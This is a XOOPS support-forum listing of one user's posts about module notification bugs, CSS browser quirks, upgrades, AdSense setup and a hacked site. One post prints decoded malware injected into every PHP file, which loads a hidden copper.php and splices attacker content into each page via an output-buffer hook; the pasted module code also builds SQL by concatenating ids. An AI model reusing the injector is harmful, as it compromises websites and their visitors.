1
fosterm
Smartsection Problems with Notifications
  • 2009/4/30 15:46

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi All

I am running XOOPS 2.3.1 with smartsection 2.13.

I have noticed a problem with the notifications in this module on my site at www.montgomerycountymonitor.com

Notifications for other modules on the site seem to be working appropriately.

The specific problem with the notifications with this module (called news and a clone of the module referred to as public information on my site) is that I do not get a message that notifications are updated when I attempt to add notifications and of course the notifications do not work.

When I check one of the notification boxes while viewing an individual story and hit the "Update Now" button the notifications do not update. It appears it is trying to update but it just refreshes the screen and the box I had just checked is no longer checked.

However, when I attempt to change global notifications on the categories summary page ( reached by clicking on Public Information on the left hand Main Menu), I do get the notifications updated message and the update box that I clicked remains checked after the page refreshes

When I turn on error messages I only get a couple of notices, not actual errors.

So it seems the global notifications for categories is working properly but not any other notification for this module.

I am including the code from the /modules/public_information/include/notification.inc.php in hopes that someone can offer some help.

<?php

/**
* $Id: notification.inc.php,v 1.6 2006/03/03 11:52:54 malanciault Exp $
* Module: Public_Information
* Author: The SmartFactory <www.smartfactory.ca>
* Licence: GNU
*/

function public_information_notify_iteminfo($category$item_id)
{
    global 
$xoopsModule$xoopsModuleConfig$xoopsConfig;
    
    include_once(
XOOPS_ROOT_PATH "/modules/public_information/include/seo_functions.php");
    
    if (empty(
$xoopsModule) || $xoopsModule->getVar('dirname') != 'public_information') {
        
$module_handler = &xoops_gethandler('module');
        
$module = &$module_handler->getByDirname('public_information');
        
$config_handler = &xoops_gethandler('config');
        
$config = &$config_handler->getConfigsByCat(0$module->getVar('mid'));
    } else {
        
$module = &$xoopsModule;
        
$config = &$xoopsModuleConfig;
    } 

    if (
$category == 'global') {
        
$item['name'] = '';
        
$item['url'] = '';
        return 
$item;
    } 

    global 
$xoopsDB;

    if (
$category == 'category') {
        
// Assume we have a valid category id
        
$sql 'SELECT name, short_url FROM ' $xoopsDB->prefix('public_information_categories') . ' WHERE categoryid  = ' $item_id;
        
$result $xoopsDB->query($sql); // TODO: error check
        
$result_array $xoopsDB->fetchArray($result);
        
$item['name'] = $result_array['name'];
        
$item['url'] = public_information_seo_genUrl('category'$item_id$result_array['short_url']); 
        return 
$item;
    } 

    if (
$category == 'item') {
        
// Assume we have a valid story id
        
$sql 'SELECT title, short_url FROM ' $xoopsDB->prefix('public_information_items') . ' WHERE itemid = ' $item_id;
        
$result $xoopsDB->query($sql); // TODO: error check
        
$result_array $xoopsDB->fetchArray($result);
        
$item['name'] = $result_array['title'];
        
$item['url'] = public_information_seo_genUrl('item'$item_id$result_array['short_url']); 
        return 
$item;
    } 


?>


For those trying to help you can login using the following:

Username: test
Pass: tester

If any other info is needed dont hesitate to ask.

I have thoroughly searched both this site and the modules old site and new site and have been unable to resolve this issue.

Thanks for the help.

Foz



2
fosterm
Re: Need Help with Browser Inconsistencies
  • 2009/3/31 19:13

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi ghia

With your help and after tinkering around a bit in my css I figured out how to disable the bullets (yay - thank you very much).

I had a difficult time making the blocks present properly. I could not find Quote:
#centercolumn .blockContent, .xo-blockcontent {
display: inline-block;


in my css file.

I downloaded the add-on called firebug and tinkered around with my site a bit.

While tinkering with the blocks, firebug indicated the some aspects of the blocks were controlled by the file xoop.css.

I did not realize there was a xoops.css (located in the root directory).

Inside xoop.css I found the code you mentioned and removed it as you suggested.

That fixed the block issues.

Thanks for all your help ghia. This issue had me perplexed for many months.

Thanks to you I was able to resolve it.

Foz



3
fosterm
Need Help with Browser Inconsistencies
  • 2009/3/30 19:57

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hiya

I wasn't for sure where to ask this question...please move it if it is in the wrong area.

I am running 2.3.1 and for some time now I have had visual discrepancies when using the latest Firefox.

If you look at my site www.montgomerycountymonitor.com with Internet Explorer, you will see how I want the site to look.

Viewing the site with Firefox, causes some issues.

For example on the front page the forums block as well as other blocks, are all left justified when viewed using Foxfire.

Also, some of the blocks, when viewed in Firefox have bullets to the left of the text. These bullets are not visible when viewed with Internet Explorer.

My visitors at this point breakdown as follows 80% use internet explorer, 10% use Firefox and the additional 10% is spread among various others browsers.

I have tried many times over the last year to attempt to address this issue, but have been unable to successfully rectify the differences between the two browsers.

Does anyone have any suggestions or is anyone willing to fix the issue for payment?


Thanks

Foz



4
fosterm
Re: Uninstall Protector before upgrade from 2.0.16 to 2.3.1?
  • 2008/11/3 21:42

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Thank you

Upgrade from 2.0.16 to 2.3.1 went very smooth.

Hope others have as much luck as I did


Foz



5
fosterm
Uninstall Protector before upgrade from 2.0.16 to 2.3.1?
  • 2008/11/2 23:17

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


I have searched for 2.3.1 and protector and have yet to find an answer to my question.

I am currently running XOOPS 2.0.16 and am preparing to upgrade to 2.3.1.

I currently have Protector 3.04 installed with my XOOPS 2.0.16.

My question is, Do I need to uninstall protector before I proceed with my upgrade?

Thanks

Foz



6
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 22:49

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


I do not have "Allow PHP code in ads to be executed" enabled in my OpenX installation.

I found someone else with the exact issue running different software that uses similar editors.

http://www.tinyportal.net/index.php?topic=26106.0;all

I am still a bit confused. If the exploit is in FCK and I make another editor my default editor (tinymce) will that prevent the exploit through FCK?

Also from the link above it looks like tinymce may have a problem also?

Thanks again for all the help.

Foz



7
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 20:05

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi Ghia_

Thank you for the detailed reply.


I did not ask my provider to provide support for his XOOPS editor entrance theory. Being a novice at this it never crossed my mind, but you are right , that question should be asked.

Using one of the links you posted, I changed my default XOOPS editor to tinyMCE instead of the XOOPS default. I assume it was originally FCK since I have never messed with the editors.

Unfortunately I had already restored the compromised files by the time I read your post asking what the copper.php file does. If this happens again I will make sure to follow up on that lead.

I did a cursory look at the OpenX site and did not find anything related to this hack..will continue to look.

Modules I am running on the 2.0.16 version are as follows:

WFDownload 3.2
pages 1.16
ads 3
Smartsection 2.13
Smartfaq 1.08
Liaise 1.26
Content 0.5
XHLD 3.07
Google Maps 0.83
Wordpress 2.05
protector 3.04
cbb 3.08
Xoops Tag 0.92
Smartclone 1
Happy Search 0.53
Happy Linux 1.4
Frameworks 1.22


Thanks Foz



8
fosterm
Sites Hacked .. Need some help please
  • 2008/9/29 23:45

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi all

Recently one of my sites which is still running 2.2.5 was hacked. Each php file had encrypted code added at the top of the file.
Every php file on my account was infected. The encrypted code was decoded by my provider and is as follows
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/<body/si',$c)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}


My provider stated, "We checked the issue and we could see that the codes are added to use the default editor of XOOPS software that you are using."

Can anyone tell me what the added code does?

Just today another site which is running XOOPS 2.0.16 and OpenX was hacked. The hack added an encrypted code to the start of every php file in the following directories,
root, Cache, OpenX, CPG and Frameworks.

Can anyone direct me to a solution to stop this behavior? Is it true that the editor from even XOOPS 2.0.16 can be used to inject this kind of code into php files?

What procedures do I need to perform to troubleshoot and or prevent this issue?

Both sites are running on the same shared server. File permissions on the changed files were set to 755 and 644. Mainfile.php was not altered due to it being set to 444 I assume.

If I left out anything necessary to understand the situation please ask me to provide it.


Thanks for the help
Foz



9
fosterm
Re: Adsense Authentication
  • 2008/4/16 16:54

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi all

I posted this same question on the adsense forums and I thought others might like to see the solution for this.

Link to solution

Hope this helps someone out.

Foz



10
fosterm
Adsense Authentication
  • 2008/4/13 17:27

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Has anyone setup adsense authentication with their XOOPS site?

I am trying to but I am not quite for sure what parameters to include in the site authentication setup.

Could someone please provide some help with this issue?

Here is a screen shot of the setup page.

Screenshot

Can anyone suggest values for this?

For Authentication Method I can choose POST GET or HTTP (.htaccess)

I am using XOOPS 2.0.16

Thanks for the help

Foz




TopTop
(1) 2 3 4 ... 9 »



Login

Username:
Password:

Lost Password? Register now!

Who's Online

67 user(s) are online (37 user(s) are browsing Support Forums)


Members: 0


Guests: 67


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: May 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits